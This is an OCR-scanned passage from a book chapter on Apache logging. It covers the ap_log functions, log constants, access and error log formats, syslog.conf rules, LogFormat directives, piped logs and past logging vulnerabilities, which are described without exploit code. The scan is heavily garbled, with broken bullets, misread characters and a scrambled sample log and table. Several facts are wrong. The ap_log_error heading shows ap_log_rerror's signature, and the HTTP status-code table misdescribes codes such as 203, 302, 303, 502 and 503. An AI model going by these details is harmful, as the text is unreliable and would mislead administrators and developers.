This chapter was merely a refresher on operating-system access controls and other 
general administrative issues, subjects you likely know well. However, in a significant 
percentage of cases, mishaps in these areas can undermine Apache’s otherwise excel- 
lent security. (Sometimes, instituting different permissions on files residing in the 
same directory, for example, can be complicated.) It pays to periodically check 
permissions beneath DocumentRoot and in your users’ directories (if you have any). 
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What Is Logging, Exactly? Related Logging Tools 

Many newbie Web administrators know little about e Other Interesting Logging 
logging. This is the case even though many network appli- Tools Not Specific to Apache 


cations offer extensive logging facilities. Casual users in 
particular rarely exploit the wealth of information logs 
offer—chiefly because they have no reason to. However, as 
a Webmaster, you'll find that logs are indispensable. 


Briefly, logging is any procedure by which an application 
records events as they happen and preserves these records 
for later perusal. 


It’s difficult to say when logging first became a staple in 
computing, but it stems from the discipline of program- 
ming. When developers write programs, they want diag- 
nostic data on hand. Such diagnostic data can reveal flaws 
in a program’s logic or behavior. 


Some things logs can reveal are 


e Whether the program faulted, and if so, when 
and why 


e The program’s UID and PID 
e Who used the program and when 


e Whether the program is performing tasks as you 
intended 
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In a security context, however, logging serves a narrower function: to preserve 
evidence of an attacker’s evil deeds. 


How Apache Handles Logging 


Although Apache applies many functions and constants in or related to logging, its 
chief logging functions are the following: 


e ap_log error 
e ap_log perror 


e ap_log_rerror 
Let’s briefly examine these now. 


ap_log_error 
ap_log error is the primary logging routine in Apache. Its structure looks like this: 


void ap_log_rerror(const char *file, int line, int level, 
const request_rec *r, const char *fmt, ...) 
__attribute__((format(printf,5,6))); 
Broken down, its elements are as follows: 
e file—Stores the file you call the function from 
e line—Stores the line number you call it from 
e level—Stores the error message’s level 
e status—Stores the previous command’s status code 
e s—Stores the server on which you're logging 
e fmt—Stores the format string 


e ...—Stores the arguments that fill fmt 


ap_log_perror 


ap_log_perror is the second of the primary logging routines in Apache, and writes 
to error_log using a printf-like format. Its structure looks like this: 


AP_DECLARE(void) ap_log_perror(const char *file, int line, int level, 
apr_status_t status, apr_pool t *p, 
const char *fmt, ...) 
__attribute__((format(printf,6,7))); 
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Broken down, its elements are as follows: 
e file—Stores the file you call the function from 
e line—Stores the line number you call it from 
e level—Stores the error message’s level 
e status—Stores the previous command’s status code 
e p—tThe pool that you’re logging for 
e fmt—Stores the format string 


e ...—Stores the arguments that fill fmt 


ap_log_rerror 


ap_log_rerror is the last of the primary logging routines in Apache, and writes to 
error_log using a printf-like format. Its structure looks like this: 


AP_DECLARE(void) ap_log_rerror(const char *file, int line, int level, 
apr_status_t status, const request_rec *r, 
const char *fmt, ...) 

__attribute__((format(printf,6,7))); 

Broken down, its elements are as follows: 

e file—Stores the file you call the function from 

e line—Stores the line number you call it from 

e level—Stores the error message’s level 

e status—Stores the previous command’s status code 
e s—tThe request that you’re logging for 

e fmt—Stores the format string 


e ...—Stores the arguments that fill fmt 


Other Apache Logging Functions and Facilities 


In addition to ap_log_ error, ap_log_perror, and ap_log_rerror, Apache contains 
numerous functions and constants that assist in or otherwise support the logging 
process. 


Apache Log Constants 
Apache log constants appear throughout Apache’s source code. Table 9.1 describes 
the major Apache log constants. 
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TABLE 9.1 Apache Log Constants 





Constant Description 

APLOG_ALERT Logging alert messages 

APLOG_CRIT Logging critical messages 
APLOG_DEBUG Logging debug messages 
APLOG_EMERG Logging emergency messages 
APLOG_ERR Logging error messages 

APLOG_INFO Logging informational messages 
APLOG_LEVELMASK Logging messages that exceed minimum level 
APLOG_NOTICE Logging notice messages 
APLOG_WARNING Logging warning messages 
APLOG_WIN32ERROR Logging WIN32 error messages 
SERVER_BUSY_LOG Indicates Apache is writing to a log file 





Table 9.2 lists the mask levels of each log constant. 


TABLE 9.2 Apache Log Mask Levels 


Constant Mask Level 





APLOG_EMERG 
APLOG_ALERT 
APLOG_CRIT 
APLOG_ERR 
APLOG_WARNING 
APLOG_NOTICE 
APLOG_INFO 
APLOG_DEBUG 


NWO BWN | CO 





When writing code to log messages into the appropriate log files, use this syntax: 


ap_log_rerror(APLOG_MARK, APLOG_NOERRNO| 
»APLOG CONSTANT, r, "%s", message); 


CONSTANT, in this case, could be any valid error constant, including ALERT, CRIT, 
DEBUG, EMERG, ERR, INFO, LEVELMASK, MARK, NOERRNO, NOTICE, WARNING, or WIN32ERROR. 


Other Apache Logging Components 
Apache also supports many modules that carry log functions, routines, hooks, and 
constants. Table 9.3 lists several of them. 


NOTE 


Line numbers referenced in Table 9.3 point to what line of source code the discussed function 
begins on before includes. 
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TABLE 9.3 Some Apache Modules That Reference Logging Functions, Hooks, and 


Constants 
Module 


Explanation 





apr_cpystrn.c 


http_request.c 


mod_dav.c 


mod_info.c 


mod_isapi.c 


mod_log_config.c 


This is Apache’s replacement for the strncpy() function. 
apr_cpystrn() is considered superior because it null terminates and 
doesn’t null fill. On line 254, it calls apr_log_error(). 

Contains functions to get and process requests. When it encounters a 
bad URL request from the user, it calls ap_log_rerror() on line 221. 
This is the DAV extension module for Apache 2.0. This is a Web-based 
Distributed Authoring and Versioning extension module that lets users 
collaboratively edit and maintain files on remote servers. It calls 
ap_log_error() too many times to mention, especially in 

dav_log err(). 

This is the information module, which displays configuration informa- 
tion for the server and all included modules. It calls the hook 
ap_hook_get_log_ transaction. 

This module implements Microsoft's ISAPI, enabling Windows-based 
Apache to load Internet Server Applications (ISAPI) from the ISAPI 2.0 
specification. The only exceptions to this are the Microsoft-exclusive 
asynchronous I/O extensions. It calls app_log_error() on lines 277, 
287, 299, 315, 486, 516, 844, 861, 875, 895, 971, 984, 992, 1072, 
1080, 1120, 1138, 1147, 1244, 1249, and 1257. 

This module implements the TransferLog directive (used by the 
common log module), and additional directives LogFormat and 
CustomLog. You'll be using these a great deal when you specify how, 
where, why, and what your logging facilities log. It uses 

app_log error() on lines 1056, and uses the static hooks 
ap_hook_pre_config(), ap_hook_child_init(), 
ap_hook_open_logs(), 

ap_hook_log_ transaction().log_remote_host(), 
log_remote_address(), log local_address(), 
log_remote_logname(), log _remote_user(), log request_line(), 
log_request_file(), log request_uri(), log_request_method(), 
log_request_protocol(), log _request_query(), log _status(), 
clf_log_ bytes_sent(), log bytes_sent(), log_header_in(), 
log_header_out(), log_note(), log_env_var(), log_cookie(), 
log_request_time(), log request_duration(), log _request_dura- 
tion_microseconds(), log_virtual_host(), log_server_port(), 
log_server_name(), log_child_pid(), and 
log_connection_status(). 
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TABLE 9.3 Continued 


Module Explanation 





mod_rewrite.c This is the URL Rewriting Module, which uses a rule-based rewriting 


engine (based on regular-expressions parser) to rewrite requested URLs 
on the fly. It calls app_error_log on lines 946, 981, 1115, 1358, 2687, 
2725, 2788, 3188, 3128, 3269, and 3340. 


mod_ssl_engine_log.c This module handles SSL errors and logs them. It uses ss1_log_open(). 


mod_status.c This module displays copious internal data about how Apache is 


performing and the state of all children processes. It calls 
ap_rerror_log() on line 267. 


mod_user_track This Apache module uses the client-side cookie protocol developed by 


Netscape to track users. 


mod_winnt_mem.c This module contains Windows-specific information and functions. (For 


example, code that enables Apache to accept processing on Windows 
95/98 uses a producer/consumer queue model. A single thread accepts 
connections and queues the accepted socket to the accept queue for 
consumption by a pool of worker threads). It calls ap_log_error() 
many times. 





Apache Logging Routines and Hooks 


This next section lists important Apache logging routines and hooks and describes 
their respective functions. 


ap_close_piped_log—Closes the piped log and kills the logging process. See 
log.c (line 755) and http_log.h (line 260): AP_DECLARE (void) 
ap_close piped_log(piped_log *pl). 


ap_error_log2STDERR—Converts STDERR to the error log. See log.c (line 327) 
and http_log.h (line 216): AP_DECLARE (void) 
ap_error_log2STDERR(server_rec *s). 


ap_get_remote_logname—Retrieves the login name of the remote user, if avail- 
able. See http_core.h, line 202: AP_DECLARE(const char *) 
ap_get_remote_logname(request_rec *r). 


ap_log_assert—Logs an assertion to the error log. See log.c, on line 559, and 
httpd.h, on line 1549: AP_DECLARE(void) ap_log_assert(const char *szExp, 
const char *szFile, int nLine) _ attribute__((noreturn) ); 


ap_log_error—One of the primary logging routines in Apache. See http_log.h 
(line 158), log.c, and most modules. 


ap_log error_old—No longer evident as of version 2.0.28. 
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e ap_log pid—Logs the current PID of the parent process. See http_log.h (line 
223). AP_DECLARE (void) ap_log pid(apr_pool_t *p, const char *fname); 
describes a pool and a file to log to. 


e ap_log reason—Explains the reason for the log element. In default_handler. 
(Example: “file permissions deny server access”) 


e ap_log_transaction—Hook: 
AP_DECLARE_HOOK(int,log transaction, (request_rec *r)), allows modules 
to do module-specific logging. See http_protocol.h, line 572. Defines the 
current request (r) and the status (OK, DECLINED, or HTTP_SOMETHING). 


e ap_open_logs—Opens the error log and replaces STDERR with it. See 
http_log.h, line 127: void ap_open_logs (server_rec *s_main, apr_pool_t 
*p). Defines the main server (s) and the pool (p1). 


e piped_log—Opens the piped log process. See http_log.h, line 253: 
AP_DECLARE(piped_log *) ap_open_piped_log(apr_pool_t *p, const char 
*program). Defines a pool (p1), the targeted program (program), and returns the 
piped log structure. 


httpd Logs 
httpd stores its logs in /var/log/httpd/apache in two files: 


e access_log—Stores general access information: who contacted the server, 
when, how, and the actions taken. 


e error_log—Stores access and other errors. 
Let’s look at the format of these files now. 


access_log: The HTTP Access Log File 


access_log stores the following values: 
e The visitor’s IP address 
e The event’s time and date 
e The command or request 


e The status code 
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Some sample output: 


[root@linux6 apache]# more access_log 


172.16.0.1 
=1879 
172.16.0.1 
=1879 
172.16.0.1 
=HTTP/1.0" 
172.16.0.1 
=HTTP/1.0" 
172.16.0.1 
=HTTP/1.0" 
172.16.0.1 
=HTTP/1.0" 
172.16.0.1 
=HTTP/1.0" 
172.16.0.1 
=HTTP/1.0" 
172.16.0.1 
=HTTP/1.0" 
172.16.0.1 
=HTTP/1.0" 
172.16.0.1 
=HTTP/1.0" 
172.16.0.1 
=HTTP/1.0" 


- - [01/Jan/2001:13:09:46 -0700] "GET / HTTP/1.0" 200 


- - [01/Jan/2001:13:09:46 -0700] "GET / HTTP/1.0" 200 


- - [01/Jan/2001:13:09:46 -0700] "GET /mmback.gif 


404 204 


- - [01/Jan/2001:13:09:46 -0700] "GET /mmback.gif 


404 204 


- - [01/Jan/2001:13:09:46 -0700] "GET /head.gif 


200 17446 


- - [01/Jan/2001:13:09:46 -0700] "GET /head.gif 


200 17446 


- - [01/Jan/2001:13:09:57 -0700] "GET /mmback.gif 


404 204 





- - [01/Jan/2001:13:09:57 -0700] "GET /mmback.gif 


404 204 


- - [01/Jan/2001:13:10:04 -0700] "POST / 


405 228 


- - [01/Jan/2001:13:10:04 -0700] "POST / 


405 228 


- - [01/Jan/2001:13:10:06 -0700] "GET /mmback.gif 


404 204 


- - [01/Jan/2001:13:10:06 -0700] "GET /mmback.gif 


404 204 


Table 9.4 provides a quick reference for httpd status codes. 








TABLE 9.4 httpd Status Codes 

Code What It Means 

200 The 200 code indicates that everything went well; the transfer was successful and 
occurred without error. 

201 The 201 code indicates that a POST command was issued and satisfied successfully 
without event. 

202 The 202 code indicates that the client’s command was accepted by the server for 
processing. 

203 The 203 code indicates that the server could only partially satisfy the client’s 
request. 

204 The 204 code indicates that the client’s request was processed, but that the server 


couldn’t return any data. 
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TABLE 9.4 Continued 





Code What It Means 

300 The 300 code indicates that the client requested data that has recently been 
moved. 

301 The 301 code indicates that the server found the client’s requested data at an alter- 
nate, temporarily redirected URL. 

302 The 302 code indicates that the server suggested an alternate location for the 
client’s requested data. 

303 The 303 code indicates that there was a problem because the server could not 
modify the requested data. 

400 The 400 code indicates that the client made a malformed request that could there- 
fore not be processed. 

401 The 401 code indicates that the client tried to access data that it is not authorized 
to have. 

402 The 402 code indicates that a payment scheme has been negotiated. 

403 The 403 code indicates that access is forbidden altogether. 

404 The 404 code (the most often-seen code) indicates that the document was not 
found. 

500 The 500 code indicates that an internal server error occurred from which the server 
could not recover. (This is a common error when a client calls a flawed CGI script.) 

501 The 501 code indicates that the client requested an action that the server cannot 
perform or does not support. 

502 The 502 code indicates that the server is overloaded. 

503 The 503 code indicates that httpd was waiting for another gateway service to 


return data, but that the external service hung or died. 





error_log: The Error Message Log 
error_log, as its name would suggest, stores errors. As reported in Apache’s online 
documentation: 


The server error_log, whose name and location is set by the ErrorLog directive, is the most 
important log file. This is the place where Apache httpd will send diagnostic information and 
record any errors that it encounters in processing requests. It is the first place to look when a 
problem occurs with starting the server or with the operation of the server, because it will 


often contain details of what went wrong and how to fix it. 


error_log stores the following fields by default: 


e The date and time 


e The type of report (error) 
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e The reason for the error 
e The service 


e The action taken (sometimes) 


Some sample output: 


[root@linux6 apache]# more error_log 

[Thu Jan 1 12:03:01 2001] [notice] Apache/1.3.1 (Unix) configured 
= -- resuming normal operations 

[Thu Jan 1 13:09:46 2001] [error] File does not exist: 

=» /home/httpd/html/mmback. gif 

[Thu Jan 1 13:09:57 2001] [error] File does not exist: 

=» /home/httpd/html/mmback. gif 

[Thu Jan 1 13:10:06 2001] [error] File does not exist: 

=» /home/httpd/html/mmback. gif 

[Thu Jan 1 13:33:30 2001] [notice] httpd: caught SIGTERM, 
shutting down 

[Thu Jan 1 13:35:04 2001] [notice] Apache/1.3.1 (Unix) configured 
™-- resuming normal operations 

[Thu Jan 1 13:51:39 2001] [notice] httpd: caught SIGTERM, 
shutting down 

[Thu Jan 1 21:23:28 2001] [notice] Apache/1.3.1 (Unix) configured 
™-- resuming normal operations 


Setting error_log’s Location and Log Levels 


To set error_log’s location and log levels, you use two directives: 
e ErrorLog 


e LogLevel 


Let’s briefly look at those now. 


ErrorLog 

ErrorLog sets the location and name of error_log. If you’d precede the name with a 
slash, then Apache will create and write this file in a location relative to ServerRoot. 
The syntax is 


ErrorLog file-path|syslog/:facility] 
Here, file-path is where (in your directory structure) you want Apache to send logs. 


syslog[: facility] is the facility (in syslog) you want to have Apache send logs to 
syslogd. 
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In version 1.3 and later, you can use syslog instead of a filename. This calls 
syslogd(8) if your system supports it (this is for Unix folks). It uses syslog facility 
local7 by default. However, you can change this by using syslog:facility and 
naming some other facility in syslog(1). Let’s briefly cover syslog now and the 
implications of using it. 


syslog and Logging System and kernel messages in Unix are handled by two 
daemons: 


e syslogd—Records the type of logging that many programs use. Typical values 
that syslogd traps include the program name, facility type, priority, and stock 
log message. 


e klogd—Intercepts and logs kernel messages. 


To see syslogd and klogd in action, look at /var/log/messages. 


/var/1log/messages receives message output from syslogd and klogd. 


NOTE 


If your system is antiquated, messages might flow to /var/adm instead. 





System and kernel diagnostic messages appear in the order in which they are 
received: 


[root@linux6 log]# more messages 

Jan 1 12:02:50 linux6 syslogd 1.3-3: restart. 

Jan 1 12:02:52 linux6 kernel: klogd 1.3-3, log source = 
/proc/kmsg started. 

Jan 1 12:02:52 linux6 kernel: Loaded 4122 symbols from 

=» /boot/System.map-2.0.35. 

Jan 1 12:02:52 linux6 kernel: Symbols match kernel version 2.0.35. 
Jan 1 12:02:52 linux6 kernel: Loaded 95 symbols from 16 modules. 
Jan 1 12:02:52 linux6 kernel: VFS: Mounted root (ext2 filesystem) 
readonly. 

Jan 1 12:02:52 linux6 kernel: 1p0 at @x@3bc, (polling) 

Jan 1 12:02:52 linux6 kernel: CSLIP: code copyright 1989 

Regents of the University of California 

Jan 1 12:02:52 linux6 kernel: SLIP: version 0.8.4-NET3.019-NEWTTY- 
MODULAR (dynamic channels, max=256). 

Jan 1 12:02:52 linux6 kernel: PPP: version 2.2.0 (dynamic channel 
allocation) 

Jan 1 12:02:52 linux6 kernel: PPP Dynamic channel allocation code 
copyright 1995 Caldera, Inc. 
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Jan 1 12:02:52 linux6 kernel: PPP line discipline registered. 
Jan 1 12:02:52 linux6 kernel: Swansea University Computer Society 
wIPX 0.34 for NET3.035 

Jan 1 12:02:52 linux6 kernel: IPX Portions Copyright (c) 1995 
Caldera, Inc. 

Jan 1 12:02:52 linux6 kernel: sysctl: ip forwarding off 

Jan 1 12:02:52 linux6 amd[23101]: My ip addr is 0x100007f 

Jan 1 12:02:52 linux6 amd[23102]: file server localhost type 
local starts up 

Jan 1 12:02:53 linux6 amd[23102]: /etc/amd.localdev mounted 
fstype toplvl on / 





In addition to standard syslog and kernel messages, you’ll also find messages from 
network services: 


Jan 1 12:10:38 linux6 syslog: LOGIN ON tty1 BY hapless 

Jan 1 12:11:36 linux6 syslog: FAILED LOGIN 1 FROM 172.16.0.1 
FOR haples, User not known to the underlying 
authentication module 

Jan 1 12:11:36 linux6 syslog: FAILED LOGIN 1 FROM 172.16.0.1 
FOR haples, User not known to the underlying 
authentication module 

Jan 1 12:11:40 linux6 syslog: LOGIN ON ttyp® BY hapless FROM 172.16.0.1 
Jan 1 12:12:12 linux6 syslog: ROOT LOGIN ON tty1 

Jan 1 12:14:37 linux6 ftpd[23622]: FTP LOGIN FROM 172.16.0.1 
[172.16.0.1], hapless 

Jan 1 12:14:41 linux6 ftpd[23622]: FTP session closed 

Jan 1 12:15:07 linux6 ftpd[23625]: FTP LOGIN FROM 172.16.0.1 
[172.16.0.1], hapless 

Jan 1 12:15:15 linux6 ftpd[23625]: FTP session closed 





syslog.conf: Customizing Your syslog To customize syslog logging, you specify 
your rules in syslog.conf. As explained in the syslog.conf manual page: 


The syslog.conf file is the main configuration file for the syslogd(8) which logs system 
messages on *nix systems. This file specifies rules for logging. For special features see the 


sysklogd(8) manpage. 


In syslog.conf, you define rules with two fields: 
e The Selector field—What to log 


e The Action field—Where to log it 
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Let’s look at each field now. 
In the Selector field, you must specify at least one of two values: 
e The message type 


e The message priority 


The message type is called a facility, and must be one of these: 


e auth—A security facility that tracks user authentication in various services such 
as FTP, login, and so on. Essentially, the auth facility tracks any user action that 
requires a username and password to login or use the target resource. 


e authpriv—A security facility that tracks security/authorization messages. 


e cron—Tracks messages from the cron system. cron is a daemon that executes 
scheduled commands. See the cron manual page for more information. 


e daemon—Tracks additional system daemon messages. 
e kern—Tracks kernel messages. 

e 1pr—tTracks line printer system messages. 

e mail—Tracks mail system messages. 

e news—Tracks news system messages. 


e uucp—Tracks Unix-to-Unix Copy subsystem messages. 


You can specify blanket logging using only the facility and no priority. For 
example, here’s a rule that specifies that the system should send all kernel messages 
to the console: 


kern.* /dev/console 
Here, the facility is kernel and the action is to log to /dev/console. Or, if you 


wanted to log all kernel messages to /var/log/messages, you could establish a rule 
like this: 


kern.* /var/log/messages 
The second half of the Selector field is the priority, which is not always necessary 
unless you want to refine your output. The priority must be one of these: 

e alert—Indicates serious malfunctions that demand immediate attention. 


e crit—(Critical) messages indicating fatal problems. 
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e debug—These messages provide debugging information on running processes. 
e emerg—(Emergency) messages indicate emergency conditions. 
e err—(Error) messages consist of typical STDERR. 


e info—(Informational messages) report noncritical information, such as inform- 
ing you when a service starts. 


e notice—These messages are standard messages. 


e warning—These messages are standard warnings (for example, the system or 
resource couldn’t perform the requested task). 


For example, if you wanted to log error messages from your news system, you might 
create a rule like this: 


# Save news errors of level err and higher 
# in a special file. 
news.err /var/log/spooler 
Here, your values are as follows: 
e Your facility = news 
e Your priority = err (error messages) 


e Your action—log these to /var/log/spooler 


In the action field, you specify what syslog should do with the messages you’ve 
asked for. As seen previously, one possible choice is to log the messages to a particu- 
lar file. Other choices include the following: 


e Named pipes 
e The terminal or console 


e A remote machine (if it’s running syslogd) 


Specified users 


All users 


For example, suppose you wanted to send your kernel messages to the remote host 
linux3 (running syslogd). You might create a rule like this: 


kern.* @linux3 
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Or, perhaps you want to send all alerts to user support. You could create a rule like 
this: 


* alert support 


The sample syslog.conf file provided with Linux offers several prefabricated possi- 
bilities: 


[root@linux6 conf]# more /etc/syslog.conf 
syslog.cong 


# Log all kernel messages to the console. 
# Logging much else clutters up the screen. 
#kern. * /dev/console 


# Log everything (except mail and news) of level info or higher. 
# Hmm--also don't log private authentication messages here! 
*,info;news,mail, authpriv,auth.none -/var/log/messages 


# Log debugging too 
#* .debug;news,mail,authpriv,auth.none -/var/log/debug 


# The authpriv file has restricted access. 

authpriv.*;auth.* /var/log/secure 
# true, ‘auth' in the two previous rules is deprecated, 

# but nonetheless still in use... 


# Log all the mail messages in one place. 
mail.* /var/log/mail 


# As long as innd insists on blocking /var/log/news 
# (instead of using /var/log/news.d) we fall back to ... 
news.* /var/log/news.all 


# Save uucp and news errors of level err and higher 
# in a special file. 
uucp,news.err /var/log/spooler 


# Everybody gets emergency messages, plus log them on 
# another machine. 

* emerg i 

#* .emerg @loghost 
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If you plan on building a large network, I recommend logging to both local and 
remote locations. This will ensure some level of redundancy. (It’s always a good idea 
to have several versions. You never know when disaster might strike.) 


NOTE 


Using syslog has pros and cons. Certainly, you can send logs elsewhere, and even to a differ- 
ent volume or box. This is useful in that you can centralize your logs, perhaps even from 
several Web hosts to a single, unified log server. However, this complicates the parsing of log 
data when using prefabricated tools for this purpose (chiefly because other lines in syslog 
files formulate differently). Also, when you write programs or scripts to analyze Apache log 
data, you must take these issues into account. And finally, troubles can sometimes arise if your 
Web server remains up, but your log server goes down. If attackers target your log server and 
kill it, they can bang away at your Web box with impunity, knowing you won't have any logs 
to substantiate your claims. 





LogLevel 
LogLevel lets you specify at what level your error_log should log. The syntax is 


LogLevel level 


level here is one of the levels specified in Table 9.5. 


TABLE 9.5 LogLevel Log Levels 





Level Description 

alert This logs events that demand immediate attention. 

crit This logs critical conditions, such as socket failures. 

debug This logs debug-level messages, and is most useful when you're trying to isolate 
unexpected or undesirable behavior that stems from inside Apache. 

emerg This logs emergencies. Apache is unusable at this point. 

error This logs error conditions, such as when a script’s headers trail off unexpectedly. 

info This logs information messages. 

notice This logs normal conditions that are logged as a matter of course. 

warn This logs warning conditions, such as when a process doesn’t die even though 


Apache tried to kill it. 





Customizing httpd Logs 
Apache allows you to customize your logs with the LogFormat directive. Here’s the 
default: 


LogFormat "%h %l %u %t \"%r\" %s %b" 
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This indicates that by default, Apache logs the following: 


e The remote host address 


e The remote logname (unreliable and available only if the client box is running 


ident) 


e The remote user (unreliable also) 


e The time (standard log format, for example Thu Jan 1 13:10:06 2001) 


e The client’s first request 


e The status 


e The bytes sent 


Table 9.6 summarizes LogFormat directives. 





TABLE 9.6 httpd LogFormat Directives 

Directive What It Does 

%e The %e directive will define the specified environment variable. 

Sb The %b directive records the total number of bytes sent (not including 
headers). 

%f The %f directive records the filename requested. 

sh The %h directive records the remote host's address. 

%l The %1 directive records the logname (username) of the client’s user(if they're 
running ident). 

%P The %P directive records the PID of the process that satisfied the client's 
request. 

%p The %p directive records the port that the server directed the response to. 

%r The %r directive records the first line of the client’s request. 

%S The %s directive records the status of the client’s request. 

St The %t directive records the time of the request. 

%T The %T directive records the time taken to satisfy the client’s request. 

%u The %u directive records the remote user (using auth). 

%U The %U directive records the URL that the client initially requested. 

%V The %v directive records the virtual hosts hostname. 





Some Security Caveats About Logs 


By default, Apache locates its logs (at least on Unix) in directories that are only 
administrator-readable. If you change this—or change the permissions those logs 
carry by default—you endanger your system and circumvent any security benefits 
you gain from logs, for several reasons. 
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First, log files often contain very sensitive data. For example, they can contain proxy 
and server configuration information. Second, they often contain usernames (when- 
ever users access a password-protected area of your Web directory hierarchy). Lastly, 
if anyone other than the root, administrator, or operator can alter logs, they can 
destroy important evidence of attacks. 


Also note that while Apache’s logging system is well-resistant to local or remote 
attack, third-party tools or modules—which developers expressly design and offer to 
assist or extend Apache’s logging capabilities—often themselves harbor vulnerabili- 
ties. Last Lines is a good example. 


On or about December 30, 2001, an independent researcher calling himself 
BrainRawt discovered holes in Last Lines. Last Lines CGI is a free, Perl-based CGI tool 
from Matrix’s Vault. It prints x number of lines from a specified log file to a specified 
Web page. 


Last Line versions 1.3.17, 1.3.18, 1.3.19, 1.3.20, and 1.3.22 failed to filter metachar- 
acters properly, and therefore allowed remote users to examine any Web-readable 
directory. But that’s not all. Because lastlines.cgi didn’t perform proper filtering, it 
allowed remote users to execute arbitrary commands sent through a Web browser. 
This, obviously, is a critical problem. 


NOTE 


To learn more about the lastlines.cgi vulnerability, please see 
http://www. securityfocus.com/archive/1/247710. 





Sometimes, even Apache’s internal logging system can fall victim to holes. For 
example, on September 22, 2001, Daniel Matuschek reported that in versions 1.3.20 
and earlier, attackers could connect to a virtual host on an Apache system that uses 
split-logfile, and using a specially crafted URL that precedes the target address 
with a slash, overwrite or append to log files. In so doing, attackers can erase bona 
fide logs, or fabricate false log evidence. (The cure was to upgrade.) 


NOTE 


To learn more about the split -logfiles’ vulnerability, please see 
http://www. linuxsecurity.com/advisories/other_advisory-1645.html or 
http://bugs.apache.org/index.cgi/full/7848. 





The Apache logging system can even cause internal problems on rare occasion and 
on exotic operating systems. For example, in January 2001, an independent 
researcher found that on AIX, Apache 1.3.6 echoes a ws_read_domain_link error to 
error_log. Reportedly, this error jammed all running instances of httpd, resulting in 
resource starvation. One can only recover by restarting httpd, but it still returns to 
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its former behavior. (For this issue, see 
http: //bugs.apache.org/index.cgi/full/7092.) 


Another such problem—which resulted in a denial-of-service attack—emerged when 
an independent researcher in Australia identified a bug in 2.0.15 on Solaris 7, using 
gcc 2.8.1. After 16 CGI requests, Apache looped into an error-reporting state and 
rapidly filled the disk via error_log. This was a file descriptor leak and has since 
been fixed. (See http: //bugs.apache.org/index.cgi/full/7497.) 


CAUTION 


If you think you’ve found an error in Apache’s logging system or related tools, please first 
verify it before notifying Apache. Sometimes, users inadvertently misconfigure such facil- 
ities and tools and then unfairly blame Apache for problems. For example, in June 2001, 
what seemed like a bug actually wasn’t. The originator reported that Apache (using 
Apache:LogFile, TransferLog, and logrotate) was dumping access_log and error_log 
output into the same file. The solution was to properly define separate entries for each 
log, thus differentiating them. Doh! A similar issue arose when a Web administrator who 
failed to use logrotate found that Apache log files on Linux, when exceeding 2 giga- 
bytes, would cause Apache to crash. This is, of course, what logrotate is for, so remember 
to use it! 





Piped Logs 
Running Apache logs to default files (or even to syslog) is great, but perhaps you 
want more incisive control over what and where Apache logs go, and what your 
system does with them once written. If so, you might want to consider piping your 
logs to another press. To do so, name your desired log format, the path, and the 
program you're piping to. 


For LogFormat: 


LogFormat "[ %v %{%Y %m %d}t ] %h %1 %u %t \"%r\" %>s %b 
w\"%{Referer}i\" \"%{User-Agent}i\"" program 


or, for CustomLog: 


CustomLog "| /path/to/parselog /path/to/logs" program 


What should you pipe your logs to? That’s hard to say. I’ve seen everything from 
custom parsing engines to archiving utilities, to administrators sending their logs to 
IRC. (Yes, IRC. It sounds ridiculous, but if you spend all your time on IRC—and you 
want to watch your logs in real time—IRC might be an option. For an interesting 
perspective on this in Java, see http://www. javaworld.com/jw-10-2001/jw-10- 
cooltools.html.) 
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You'll find the piped logging structure in http_log.h, from lines 225 to 244: 


typedef struct piped_log piped_log; 


fx 
* The piped logging structure. Piped logs are 
used to move functionality out of the main server. 
For example, log rotation is done with piped logs. 
+ 
struct piped_log { 
/** The pool to use for the piped log */ 
apr_pool_t *p; 
/** The pipe between the server and the logging process */ 
apr_file_t *fds[2]; 
/* XXX - an #ifdef that needs to be eliminated 
from public view. Shouldn't be hard */ 
#ifdef AP_HAVE_RELIABLE_PIPED_LOGS 
/** The name of the program the logging process is running */ 
char *program; 
/** The pid of the logging process */ 
apr_proc_t *pid; 
#endif 
}; 


Apache opens the piped log process: 
AP_DECLARE(piped_log *) ap_open_piped_log(apr_pool_t *p, 
const char *program) ; 
The parameters here are 

e p—tThe pool to allocate out of 


e program—The program to run in the logging process 


Eventually, Apache closes the piped process: 

AP_DECLARE(void) ap_close_piped_log(piped_log *pl); 

The parameter here is p1, the piped log structure. To read and write pl, Apache uses 
ap_piped_log read_fd(pl) and ap_piped_log write fd(pl). 


One interesting element here is how Apache tracks the piped process. It associates 
with the process (as you can see above) a PID for tracking purposes (apr_proc_t 
*pid;). This underlying data structure (really, a linked list) contains sufficient infor- 
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mation on the piped process to facilitate monitoring. Apache uses this structure (and 
traverses children linked lists) to find and terminate (or otherwise maintain) piped 
processes. 


CAUTION 


Note that on Solaris (and some sh versions), piping can bring problems. For example, 
when Apache pipes logs, a shell spawns with the -c option, and then comes the 
command, which spawns yet another shell. Sometimes, when a HUP is sent, the root, 
top-level Apache process receives it, but children don’t. This is so sometimes even despite 
the linked list approach. This is not a problem in bash or ksh. Also note that on Win32, 
you must quote files, paths, parameters, and the external script or program’s name. 
Moreover, you must use the latest Apache release and Windows NT 4.0 or better. 
Otherwise, Apache cannot spawn the shell necessary to handle the piped log, and you'll 
receive an error like ap_spawn_child: Bad File descriptor. Couldn't fork child for 
piped log process. 





If Apache detects a problem with a child process, it might do one of several things. 
Table 9.7 illustrates the various constants that can apply under such circumstances, 
and what Apache will do. 


TABLE 9.7 Constants Dealing with Children Relevant to Piping 





Tool Description and Location 

OC_REASON_DEATH Apache discovers that a real child (not a server) dies and calls the 
maintenance function to deal with it, passing the reason along. 

OC_REASON_LOST When Apache is about to restart and a child is neither obviously 


alive nor dead, Apache cannot pass the maintenance function a 
“normal” notification to justify killing processes (for example, 
OC_REASON_DEATH or OC_REASON_RESTART). Apache then sends the 
value of this constant. 

OC_REASON_RESTART When Apache restarts, it must kill all processes. It calls the mainte- 
nance function (passing the value of this constant) to notify that 
processes must die because it’s restarting. 

OC_REASON_UNREGISTER When Apache calls ap_unregister_other_child() and then 
removes the associated node from the linked list, it calls the main- 
tenance function. 

OC_REASON_UNWRITABLE Apache discovers through fds() that a node’s fd variable is 
unwritable, and thus calls the maintenance function. 





From a security context, take care in what you pipe logs to. Logging pipes to 


programs is only slightly less dangerous than assigning pipes in procmail or formail. 


Unless you’re well familiar with shell, Perl, awk, sed, or other programming, take 
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extreme care here. Shells and the aforementioned languages interpret metacharacters 
and other symbols and words in special ways. You can easily understand the problem 
by remembering these two points: 


e Remote users can, to some extent, alter, customize, or craft the strings that 
Apache logs and sends to pipes. For example, in file requests, users can enter 
whatever they want—the strings they send need not make any sense. Their 
malformed structure will not prevent Apache from sending such strings along 
to piped processes. 


e Your piped processes are bound to be shell scripts, Perl scripts, or other tools 
